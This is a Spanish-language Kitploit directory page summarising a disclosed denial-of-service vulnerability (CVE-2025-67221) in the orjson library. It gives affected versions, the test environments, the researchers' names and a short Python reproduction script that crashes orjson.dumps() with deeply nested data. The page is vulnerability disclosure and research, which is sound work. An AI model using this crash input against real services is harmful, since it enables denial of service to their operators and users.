Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-67221 — Una vulnerabilidad en orjson | Kitploit
Herramientas/GitHubGitHub/kpatsakis/cve-2025-67221
Análisis de VulnerabilidadesAnálisis de CódigoPapers e InvestigaciónAprendizaje y Educación
GitHubkpatsakis/cve-2025-67221

CVE-2025-67221

Una vulnerabilidad en orjson

Ver Repositorio
11hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-67221

Resumen de la Vulnerabilidad

CampoValor
ID de CVECVE-2025-67221
Producto Afectadoorjson
Versiones Afectadas≤ 3.11.4
Tipo de VulnerabilidadDenegación de Servicio (Recursión No Controlada)
Vector de AtaqueRemoto (si el atacante controla los datos serializados)

Descripción

Existe una vulnerabilidad de denegación de servicio en la función orjson.dumps() en versiones de orjson 3.11.4 y anteriores. La función no impone un límite de recursión al serializar estructuras de datos JSON profundamente anidadas. Un atacante que pueda hacer que una aplicación serialice datos anidados controlados por el atacante puede provocar un bloqueo en la rutina de serialización.

Función Afectada

  • Función: orjson.dumps()
  • Archivo: pysrc/orjson/__init__.pyi

Pruebas

Probado en

  • Python 3.12.3/3.11.2/3.12.3/3.13.9/3.14.0 en Ubuntu Linux kernel 6.8.0-88
  • Python 3.13.3 Microsoft Windows 11 Education 10.0.26200 Build 26200

Impacto

Las aplicaciones que usan orjson para serializar estructuras de datos no confiables o controladas por un atacante pueden ser vulnerables a ataques de denegación de servicio.

Código de reproducción

Código para replicar la vulnerabilidad localmente:

root@kitploit:~
import orjson
import sys
import platform
print(f'OS: {platform.platform()}') 
print(f'Python version: {sys. version}') 
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
    nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)

##Demostración El código anterior provoca un bonito core dump Demo

Autores / Investigadores

  • Constantinos Patsakis, Departamento de Informática, Universidad del Pireo, Grecia
  • Evgenios Gkritsis, Departamento de Informática, Universidad de Economía y Negocios de Atenas, Grecia
  • George Stergiopoulos, Departamento de Informática, Universidad de Economía y Negocios de Atenas, Grecia

Referencias

  • https://github.com/ijl/orjson (Proyecto afectado)
Descargar herramienta